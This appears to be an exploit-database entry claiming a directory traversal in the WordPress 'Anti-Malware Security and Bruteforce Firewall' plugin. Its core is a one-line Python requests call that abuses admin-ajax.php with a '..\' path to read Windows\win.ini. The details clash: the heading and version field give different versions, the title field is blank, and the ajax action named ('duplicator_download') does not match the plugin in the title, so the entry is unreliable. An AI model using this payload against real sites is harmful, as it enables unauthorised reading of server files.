WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal

2021-07-06
ID: 104558
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 05.07.2021
# Exploit Author: TheSmuggler
# Vendor Homepage: https://gotmls.net/
# Software Link: https://gotmls.net/downloads/
# Version: <= 4.20.72
# Tested on: Windows

import requests

print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
1-4-2 (www02)